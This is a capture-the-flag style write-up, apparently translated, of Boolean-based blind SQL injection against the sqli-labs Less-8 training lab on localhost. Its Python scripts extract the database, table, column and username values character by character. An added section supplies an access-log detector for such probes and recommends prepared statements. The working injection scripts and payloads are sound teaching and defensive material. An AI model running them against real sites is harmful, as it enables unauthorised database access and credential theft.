Level 8: Boolean-based blind injection
The environment here was set up quickly with phpstudy.
Put the sqli folder under www and the environment is ready.
Determine the closing character: it is '. The reason: the page gives a different response for an always-true condition than for an always-false one, which is the Boolean oracle.
The number of databases is determined to be 5.
The length of the first database name is determined to be 18.
Getting the first letter of the database name, as an example.
Everything that follows is repetitive: finding how many, finding a length, finding a name. Just as in ordinary SQL injection, inject step by step through database, table, column, data.
Since Boolean injection is tedious, use Python scripts directly (the scripts that dump the database and the tables are borrowed; the ones that dump the columns and the data I modified myself).
To use them here, just change the IP address.
Borrowed from author: 白塔河冲浪手
Principle: http://127.0.0.1/sqli/less-8/?id=1' and substr(database(),%d,1)='letter' -- +
## SQL blind injection: database name length is 8
import requests

name = ''
for j in range(1, 9):                          # character positions 1..8 of database()
    for i in 'sqcwertyuioplkjhgfdazxvbnm':      # candidate characters (lowercase letters only)
        url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr(database(),%d,1)='%s'" % (j, i)
        # print(url + '%23')
        r = requests.get(url + '%23')          # %23 is a URL-encoded '#', which comments out the rest of the query
        if 'You are in' in r.text:             # the "true" page was returned, so this character is correct
            name = name + i
            print(name)
            break
print('database_name:', name)
Principle: http://127.0.0.1/sqli/less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit row,1),position,1)='letter' -- + (the three placeholders row, position and letter are filled in by %(k,j,i))

## SQL blind injection: four tables, name length at most 8
import requests

name = ''
for k in range(0, 5):                          # row k of information_schema.tables (LIMIT k,1)
    for j in range(1, 10):                     # character positions 1..9 of the table name
        for i in 'sqcwertyuioplkjhgfdazxvbnm':  # candidate characters (lowercase letters only)
            url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'" % (k, j, i)
            # print(url + '%23')
            r = requests.get(url + '%23')      # %23 is a URL-encoded '#'
            if 'You are in' in r.text:         # "true" page: this character is correct
                name = name + i                # table names are appended without a separator
                print(name)
                break
print('table_name:', name)
## The users table has three columns; the column name length is at most 8
import requests

name = ''
for k in range(0, 4):                          # row k of information_schema.columns (LIMIT k,1)
    for j in range(1, 10):                     # character positions 1..9 of the column name
        for i in 'sqcwertyuioplkjhgfdazxvbnm':  # candidate characters (lowercase letters only)
            url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit %d,1),%d,1)='%s'" % (k, j, i)
            # print(url + '%23')
            r = requests.get(url + '%23')      # %23 is a URL-encoded '#'
            if 'You are in' in r.text:         # "true" page: this character is correct
                name = name + i                # column names are appended without a separator
                print(name)
                break
print('column_name:', name)
## Here the username column of the users table in the security database is read directly
import requests

name = ''
for k in range(0, 14):                         # row k of security.users (LIMIT k,1)
    for j in range(1, 10):                     # character positions 1..9 of the username
        for i in '1234sqcwertyuioplkjhgfdazxvbnm':  # candidate characters, now including the digits 1-4
            url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select username from security.users limit %d,1),%d,1)='%s' -- +" % (k, j, i)
            # print(url + '%23')
            r = requests.get(url + '%23')      # the query is already closed by '-- +'; the '%23' is redundant but harmless
            if 'You are in' in r.text:         # "true" page: this character is correct
                name = name + i                # usernames are appended without a separator
                print(name)
                break
print('username:', name)
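Seen from the defender's side, the scripts above leave a very recognisable trace: hundreds of requests from one client to the same path, each differing in a single character inside a `substr(...)=` comparison, with only two distinct response sizes (the "true" page and the "false" page). The following is an added example, not part of the original post or of sqli-labs, that scans web server access-log lines for exactly that pattern. It assumes Apache/nginx Common Log Format; the log lines are constructed for this example and the threshold of three probes is an arbitrary assumption, so tune it to your own traffic.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not taken from the page). The three lines
# from 10.0.0.9 mimic the character-by-character requests the scripts above send;
# note the two different response sizes (1024 = "true" page, 980 = "false" page).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /sqli/Less-8/?id=1 HTTP/1.1" 200 1024
10.0.0.9 - - [12/Mar/2024:10:00:02 +0000] "GET /sqli/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27s%27%23 HTTP/1.1" 200 1024
10.0.0.9 - - [12/Mar/2024:10:00:02 +0000] "GET /sqli/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27q%27%23 HTTP/1.1" 200 980
10.0.0.9 - - [12/Mar/2024:10:00:03 +0000] "GET /sqli/Less-8/?id=1%27%20and%20substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1)=%27e%27%23 HTTP/1.1" 200 1024
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /sqli/Less-8/?id=2 HTTP/1.1" 200 1030
"""

# Common Log Format: client, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
# String-slicing / comparison functions a character-by-character oracle needs.
PROBE_FUNC_RE = re.compile(r"\b(substr|substring|mid|ascii|ord|length)\s*\(", re.I)
# A probe always glues its condition onto the original WHERE clause with AND / OR.
BOOL_OP_RE = re.compile(r"\b(and|or)\b", re.I)


def parse_log_line(line):
    """Parse one CLF line into a dict with the decoded query string, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = int(rec["size"])
    parts = urlsplit(rec["path"])
    rec["route"] = parts.path
    rec["query"] = unquote_plus(parts.query)   # %27 -> ', %20 -> space, %23 -> #
    return rec


def is_blind_probe(query):
    """True when a decoded query string carries a Boolean-blind probe:
    a boolean operator combined with a string-slicing function call."""
    return bool(PROBE_FUNC_RE.search(query) and BOOL_OP_RE.search(query))


def summarize(log_text):
    """Per client IP: number of probe requests, routes probed, and the distinct
    response sizes seen. A true/false oracle shows up as exactly two sizes."""
    stats = defaultdict(lambda: {"probes": 0, "routes": set(), "sizes": set()})
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None or not is_blind_probe(rec["query"]):
            continue
        s = stats[rec["ip"]]
        s["probes"] += 1
        s["routes"].add(rec["route"])
        s["sizes"].add(rec["size"])
    return dict(stats)


def flag_sources(log_text, threshold=3):
    """Clients that sent at least `threshold` probe requests, most probes first."""
    stats = summarize(log_text)
    flagged = [ip for ip, s in stats.items() if s["probes"] >= threshold]
    return sorted(flagged, key=lambda ip: -stats[ip]["probes"])


if __name__ == "__main__":
    stats = summarize(SAMPLE_LOG)
    for ip in flag_sources(SAMPLE_LOG):
        s = stats[ip]
        print(f"{ip}: {s['probes']} probes on {sorted(s['routes'])}, "
              f"response sizes {sorted(s['sizes'])}")
```

The two-size signal is the useful part: a normal visitor to `/sqli/Less-8/?id=N` gets a page whose size varies with the row returned, while a Boolean oracle flips between precisely two sizes for the same `id`. Pairing that with the per-client probe count keeps false positives low even if a legitimate query string happens to contain the word "and". The actual fix for the application itself is, of course, to stop concatenating `$_GET['id']` into the SQL statement and use a prepared statement with a bound integer parameter, at which point the probes above always return the same page and the oracle disappears.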